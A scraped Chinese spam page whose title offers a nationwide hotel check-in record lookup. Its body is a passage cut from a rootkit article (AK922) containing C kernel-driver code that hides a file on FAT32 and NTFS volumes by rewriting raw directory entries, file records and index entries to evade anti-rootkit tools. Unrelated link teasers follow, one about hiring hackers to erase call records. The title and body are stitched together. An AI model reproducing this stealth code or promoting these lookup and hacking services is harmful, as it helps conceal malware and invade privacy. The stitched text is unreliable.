怎么查询全国开房记录查询系统 查酒店入住信息
FileName[1]; }INDEX_ENTRY, *PINDEX_ENTRY; 在读取磁盘文件信息时每次都是以一个扇区大小(512 bytes)的整数倍进行的,如果不了解相应卷的组织形式和数据结构,那么感觉就是数据多而繁杂,搜索效率也很低。但辅以上述结构便可快速定位待隐藏文件并进行涂改。这里不得不说一句,算法的高效是很重要的,如果采用暴力搜索的方式,那么系统BSOD的概率会大大增加。 在FAT32卷上,当AK922搜索到文件AK922.sys的目录项时,将其0x0偏移处的文件名的之一个字节置为"0xe5",即标记为删除。这样即可达到欺骗ark的目的。但为了更加隐蔽,不让winhex察觉出来,更好把文件名全部清0。 处理NTFS卷稍微麻烦些,文件记录和索引项都要抹干净,具体实现见代码,这里不再赘述。 VOID HandleAkDiskHide(PVOID UserBuf, ULONG BufLen) { ULONG i; BOOLEAN bIsNtfsIndex; BOOLEAN bIsNtfsFile; ULONG offset = 0; ULONG indexSize = 0; PINDEX_ENTRY currIndxEntry = NULL; PINDEX_ENTRY preIndxEntry = NULL; ULONG currPosition; bIsNtfsFile = (_strnicmp(UserBuf, NtfsFileRecordHeader, 4) == 0); bIsNtfsIndex = (_strnicmp(UserBuf, NtfsIndexRootHeader, 4) == 0); if(bIsNtfsFile == FALSE && bIsNtfsIndex == FALSE) { for(i = 0; i < BufLen/0x20; i++) { if(!_strnicmp(UserBuf, fileHide, 5) && !_strnicmp((PVOID)((ULONG)UserBuf+0x8), fileExt, 3)) { *(PUCHAR)UserBuf= 0xe5; *(PULONG)((ULONG)UserBuf + 0x1)= 0; break; } UserBuf = (PVOID)((ULONG)UserBuf + 0x20); } } else if(bIsNtfsFile) { //DbgPrint("FILE0..."); for(i = 0; i < BufLen / FILERECORDSIZE; i++) { if(!_wcsnicmp((PWCHAR)((ULONG)UserBuf + 0xf2), hideFile, 9)) { memset((PVOID)UserBuf, 0, 0x4); memset((PVOID)((ULONG)UserBuf + 0xf2), 0, 18); break; } UserBuf = (PVOID)((ULONG)UserBuf + FILERECORDSIZE); } } else if(bIsNtfsIndex) { //DbgPrint("INDX..."); // Index Entries offset = ((PINDEX_HEADER)UserBuf)->IndexEntryOffset + 0x18; indexSize = BufLen - offset; currPosition = 0; currIndxEntry = (PINDEX_ENTRY)((ULONG)UserBuf + offset); //DbgPrint(" -- offset: 0x%x indexSize: 0x%x", offset, indexSize); while(currPosition < indexSize && currIndxEntry->Size > 0 && currIndxEntry->FileNameOffset > 0) { if(!_wcsnicmp(currIndxEntry->FileName, hideFile, 9)) { memset((PVOID)currIndxEntry->FileName, 0, 18); if(currPosition == 0) { ((PINDEX_HEADER)UserBuf)->IndexEntryOffset += currIndxEntry->Size; break; } preIndxEntry->Size += currIndxEntry->Size; break; } currPosition += currIndxEntry->Size; preIndxEntry = currIndxEntry; currIndxEntry = (PINDEX_ENTRY)((ULONG)currIndxEntry + currIndxEntry->Size); } } } 水平有限,欢迎大家与我交流。 参考资料: [1] - 《NTFS Documentation》 [2] - Azy,《IceSword & Rootkit Unhooker驱动简析》
相关文章
业余赚钱好方法推荐,做个兼职也是很不错的!
今天,就推荐五 个赚钱的小项目,让新人朋友也能迅速获得收益。 一、操作自媒体赚钱 人人都是自媒体,个人也能成为创作者。现在很多自媒体平台,都放松了申请条件,通过注册成为创作者,机能赚取平 台的...
发挥学会专业优势 助力纺织行业高质量发展
疫情暴发以来,嘉兴市纺织工程学会号召学会理事、会员单位提高政治站位,强化使命担当,勇担社会责任,积极参与疫情防控。动员广大会员在疫情防控中结合自身产业特点和专业优势,扎实开展“暖心扶企”专项行动,...
司马光砸缸的小故事救的人到底是谁(司马光砸缸救的人之后)
坚信每一个人都听过司马光砸缸的短故事。你掌握司马光救了谁吗? 实际上,司马光的短故事来自宋代佛家弟子写的《冷斋夜话》。短故事是那般的。当一群小孩子在院子里玩耍时,在这其中一个一不小心掉进了装水的大储...
两男生吵架被老师罚牵手怎么回事 详细经过现场图曝光太逗了
近日,江苏徐州一位可爱的英语老师分享了一段“男生吵架被罚牵手”的视频。两个男生在课上起了争执,气氛原本剑拔弩张,老师让他们两个手牵手到下课,谁先松手谁道歉。两个孩子假装淡定地十指紧扣,对视的瞬间终于憋...
清华大学跻身泰晤士高等教育世界大学排行榜20强
新华社伦敦9月2日电(记者梁希之)英国泰晤士高等教育2日公布2021年度世界大学排行榜,中国清华大学排名较去年上升3位,和美国杜克大学并列第20位,成为自2011年以来首所进入排行榜前20位的亚洲大学...
找黑客可以把通话记录删了吗-模拟黑客的手机软件(有没有模拟装修房子的手机软件)
找黑客可以把通话记录删了吗相关问题 如何黑客别人微信相关问题 黑客是如何撞库的 sunwear为什么这么有钱(sunwear)...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!